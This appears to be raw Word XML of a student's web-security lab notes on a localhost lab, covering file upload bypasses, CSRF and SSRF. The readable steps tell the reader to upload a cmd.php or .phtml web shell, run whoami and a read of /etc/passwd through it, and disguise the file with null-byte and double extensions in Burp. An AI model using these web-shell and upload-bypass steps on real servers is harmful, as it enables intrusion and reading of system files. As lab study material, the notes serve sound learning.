                                  <a:pt x="14700" y="1817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44"/>
                                  <a:pt x="40650" y="6976"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="42883" y="920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0" y="285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571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0" y="857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15" style="width:3.75pt;height:71.25pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:26.25pt;mso-position-vertical-relative:text;margin-top:2.94043pt;" coordsize="476,9048">
                <v:shape id="Shape 455" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35837,42883,38416,40650,40649c38418,42881,35842,44599,32925,45814c30008,47017,26970,47625,23813,47625c20655,47625,17617,47011,14700,45808c11783,44599,9207,42881,6975,40649c4742,38416,3021,35837,1813,32922c604,30007,0,26969,0,23813c0,20656,604,17618,1813,14697c3021,11782,4742,9209,6975,6976c9207,4744,11783,3020,14700,1817c17617,608,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4744,40650,6976c42883,9209,44604,11776,45812,14697c47021,17618,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 457" style="position:absolute;width:476;height:476;left:0;top:2857;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40650,40649c38418,42875,35842,44599,32925,45802c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44599,9207,42875,6975,40649c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20656,604,17611,1813,14697c3021,11782,4742,9203,6975,6970c9207,4738,11783,3020,14700,1811c17617,608,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3020,38418,4738,40650,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 459" style="position:absolute;width:476;height:476;left:0;top:5715;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40650,40642c38418,42875,35842,44599,32925,45802c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44599,9207,42875,6975,40642c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 462" style="position:absolute;width:476;height:476;left:0;top:8572;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32916c44604,35830,42883,38410,40650,40642c38418,42875,35842,44593,32925,45802c30008,47011,26970,47619,23813,47625c20655,47619,17617,47011,14700,45802c11783,44593,9207,42875,6975,40642c4742,38410,3021,35830,1813,32916c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11770,4742,9196,6975,6970c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6970c42883,9196,44604,11770,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t>Client side control is not good for security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B44917" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="535" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Change the file content into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64C668" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="393" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="3632" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">And the file name as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">fuff for word list ----&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidR="00AB6EF2">
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="155BDA"/>
            <w:u w:val="single" w:color="155BDA"/>
          </w:rPr>
          <w:t>http://localhost/labs/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C4F75" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153" w:line="411" w:lineRule="auto"/>
        <w:ind w:left="525" w:right="870" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirb/common.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FFEAB7A" wp14:editId="48056367">
                <wp:extent cx="47625" cy="47625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4116" name="Group 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6" style="width:3.75pt;height:3.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="476,476">
                <v:shape id="Shape 472" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40650,40649c38418,42875,35842,44599,32925,45802c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44599,9207,42875,6975,40649c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1805c35842,3014,38418,4738,40650,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost/labs/uploads/cmd.php?cmd=whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2126DF" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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1C33878" wp14:editId="095A031A">
                <wp:extent cx="6581774" cy="285000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4188" name="Group 4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285000"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="285000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6527" name="Shape 6527"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2659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333375" y="37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485775" y="0"/>
                            <a:ext cx="4505177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F1479" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>localhost/labs/uploads/cmd.php?cmd=cat/etc/passed.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33878" id="Group 4188" o:spid="_x0000_s1212" style="width:518.25pt;height:22.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6527" o:spid="_x0000_s1213" style="position:absolute;top:2659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495" o:spid="_x0000_s1214" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3150,-604,6188,-1813,9103c44604,35830,42883,38410,40650,40642v-2232,2233,-4808,3957,-7725,5166c30008,47011,26970,47619,23813,47625v-3158,-6,-6196,-614,-9113,-1817c11783,44599,9207,42875,6975,40642,4742,38410,3021,35830,1813,32916,604,30001,,26963,,23813,,20656,604,17611,1813,14697,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3014,38418,4738,40650,6970v2233,2233,3954,4806,5162,7721c47021,17611,47625,20656,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 496" o:spid="_x0000_s1215" style="position:absolute;left:4857;width:4505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0E2F1479" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>localhost/labs/uploads/cmd.php?cmd=cat/etc/passed.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D4461" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>File upload 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04951163" w14:textId="0F41321E" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:lef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35B610" wp14:editId="709677CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276974</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="933450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4203" name="Group 4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933450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="933450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5"/>
                                  <a:pt x="32925" y="45808"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="30008" y="47023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3"/>
                                  <a:pt x="14700" y="45814"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11783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23812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23812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03" style="width:22.5pt;height:73.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8091pt;" coordsize="2857,9334">
                <v:shape id="Shape 498" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,608,32925,1811c35843,3014,38418,4738,40651,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20650,47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40651,40649c38418,42881,35843,44605,32925,45808c30008,47023,26970,47625,23813,47625c20655,47625,17617,47023,14700,45814c11783,44605,9207,42881,6975,40649c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 499" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32922c44604,35843,42883,38410,40650,40649c38418,42875,35842,44593,32925,45808c30008,47011,26970,47619,23813,47625c20655,47619,17617,47011,14700,45802c11783,44593,9207,42875,6975,40649c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1811c17617,608,20655,0,23813,0c26970,0,30008,608,32925,1811c35842,3014,38418,4738,40650,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 501" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32922c44604,35837,42883,38410,40650,40642c38418,42875,35842,44599,32925,45802c30008,47011,26970,47619,23813,47625c20655,47619,17617,47011,14700,45802c11783,44599,9207,42875,6975,40642c4742,38410,3021,35837,1813,32922c604,30001,0,26969,0,23813c0,20656,604,17611,1813,14697c3021,11776,4742,9203,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1805c35842,3014,38418,4738,40650,6970c42883,9203,44604,11776,45812,14691c47021,17611,47625,20656,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 503" style="position:absolute;width:476;height:476;left:2381;top:8858;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30001,45812,32916c44604,35830,42883,38410,40650,40642c38418,42875,35842,44593,32925,45802c30008,47017,26970,47619,23813,47625c20655,47619,17617,47017,14700,45808c11783,44593,9207,42875,6975,40642c4742,38410,3021,35830,1813,32916c604,30001,0,26969,0,23813c0,20650,604,17611,1813,14691c3021,11770,4742,9196,6975,6970c9207,4738,11783,3014,14700,1805c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1805c35842,3014,38418,4738,40650,6970c42883,9196,44604,11770,45812,14691c47021,17611,47625,20650,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">File is now </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>checking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> on server side now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8B5C4" w14:textId="6B0E1BF2" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Use logo.php%00.png,logo.php.png. FOR FILE name </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>manipulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> in burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF1FFE3" w14:textId="29390A4D" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="52"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ the above </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] in a </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>veiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> file ( With little content head and tail ) note the magic </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Bute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> of that file and change the name of the file to .php...Make these changes in the packet captured by </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>burp suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F27F94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577ED434" wp14:editId="379FBBEA">
                <wp:extent cx="6581774" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4192" name="Group 4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9050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6533" name="Shape 6533"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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2" style="width:518.25pt;height:1.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,190">
                <v:shape id="Shape 6534" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050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2F1541FC" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>File upload 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9125A1" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="309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05F8BE80" wp14:editId="32B0FAB5">
                <wp:extent cx="6581774" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4193" name="Group 4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647700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="647700"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6535" name="Shape 6535"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="53340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6" name="Shape 6536"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="6286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14"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11783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3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85775" y="276975"/>
                            <a:ext cx="4503043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B5527" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="117"/>
                                </w:rPr>
                                <w:t>localhost/labs/uploads/logo2.phtml?cmd=whoami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8BE80" id="Group 4193" o:spid="_x0000_s1216" style="width:518.25pt;height:51pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6535" o:spid="_x0000_s1217" style="position:absolute;top:5334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6536" o:spid="_x0000_s1218" style="position:absolute;top:6286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508" o:spid="_x0000_s1219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" path="m23813,v3157,,6195,608,9112,1811c35843,3014,38418,4738,40651,6970v2232,2233,3953,4806,5161,7721c47021,17611,47625,20650,47625,23813v,3156,-604,6188,-1813,9109c44604,35837,42883,38410,40651,40649v-2233,2232,-4808,3950,-7726,5153c30008,47017,26970,47619,23813,47625v-3158,-6,-6196,-608,-9113,-1811c11783,44605,9207,42881,6975,40649,4742,38410,3021,35843,1813,32922,604,30001,,26969,,23813,,20650,604,17611,1813,14691,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 509" o:spid="_x0000_s1220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" path="m47625,23813v,3156,-604,6188,-1813,9109c44604,35837,42883,38410,40650,40649v-2232,2226,-4808,3950,-7725,5159c30008,47017,26970,47619,23813,47625v-3158,-6,-6196,-608,-9113,-1817c11783,44599,9207,42875,6975,40649,4742,38410,3021,35837,1813,32916,604,30001,,26969,,23813,,20650,604,17611,1813,14691,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3014,38418,4738,40650,6970v2233,2233,3954,4806,5162,7721c47021,17611,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 510" o:spid="_x0000_s1221" style="position:absolute;left:4857;top:2769;width:4503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589B5527" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="117"/>
                          </w:rPr>
                          <w:t>localhost/labs/uploads/logo2.phtml?cmd=whoami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5D7D76" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>9.CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2E7E4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31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4A8ED329" wp14:editId="6447AAD4">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4196" name="Group 4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6543" name="Shape 6543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6" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 6544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51A6EF5E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF 0x001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39C550" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="282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2C71662D" wp14:editId="15699A0D">
                <wp:extent cx="6581774" cy="876300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4197" name="Group 4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876300"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="876300"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6545" name="Shape 6545"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="8572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05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485775" y="276975"/>
                            <a:ext cx="3590966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8FFB5" w14:textId="182667D7" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>Create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POC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10"/>
                                </w:rPr>
                                <w:t>Burp suite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once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we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10"/>
                                </w:rPr>
                                <w:t>login.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0" name="Shape 6560"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="581025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728662" y="591300"/>
                            <a:ext cx="5278633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3738F" w14:textId="13C71093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Reload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it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again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9"/>
                                </w:rPr>
                                <w:t>different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user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payload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does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job.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1662D" id="Group 4197" o:spid="_x0000_s1222" style="width:518.25pt;height:69pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 6545" o:spid="_x0000_s1223" style="position:absolute;top:8572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513" o:spid="_x0000_s1224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" path="m23813,v3157,,6195,608,9112,1811c35843,3014,38418,4738,40651,6970v2232,2233,3953,4806,5161,7727c47021,17611,47625,20656,47625,23813v,3156,-604,6188,-1813,9109c44604,35837,42883,38410,40651,40642v-2233,2233,-4808,3957,-7726,5160c30008,47017,26970,47619,23813,47625v-3158,-6,-6196,-608,-9113,-1817c11783,44599,9207,42875,6975,40642,4742,38410,3021,35837,1813,32922,604,30001,,26969,,23813,,20656,604,17611,1813,14697,3021,11776,4742,9203,6975,6970,9207,4738,11783,3014,14700,1805,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 514" o:spid="_x0000_s1225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" path="m47625,23813v,3150,-604,6188,-1813,9103c44604,35830,42883,38410,40650,40642v-2232,2233,-4808,3951,-7725,5160c30008,47005,26970,47619,23813,47625v-3158,-6,-6196,-620,-9113,-1823c11783,44593,9207,42875,6975,40642,4742,38410,3021,35830,1813,32916,604,30001,,26963,,23813,,20650,604,17611,1813,14691,3021,11770,4742,9196,6975,6970,9207,4731,11783,3014,14700,1811,17617,608,20655,,23813,v3157,,6195,608,9112,1811c35842,3014,38418,4731,40650,6970v2233,2226,3954,4800,5162,7721c47021,17611,47625,20650,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 515" o:spid="_x0000_s1226" style="position:absolute;left:4857;top:2769;width:3591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6278FFB5" w14:textId="182667D7" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>Create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POC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from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10"/>
                          </w:rPr>
                          <w:t>Burp suite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once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we</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F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10"/>
                          </w:rPr>
                          <w:t>login.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 6560" o:spid="_x0000_s1227" style="position:absolute;left:5810;top:628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" path="m,l47625,r,47625l,47625,,e" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 517" o:spid="_x0000_s1228" style="position:absolute;left:7286;top:5913;width:5278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4F63738F" w14:textId="13C71093" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>Reload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it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again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as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9"/>
                          </w:rPr>
                          <w:t>different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user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payload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does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job.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535193" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF 0x002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D4121" w14:textId="636EC864" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
      <w:pPr>
        <w:spacing w:after="309"/>
        <w:ind w:right="-120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6868D4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A5EB0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="327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6E5839B0" wp14:editId="49AA021C">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4202" name="Group 4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525"/>
                          <a:chOff x="0" y="0"/>
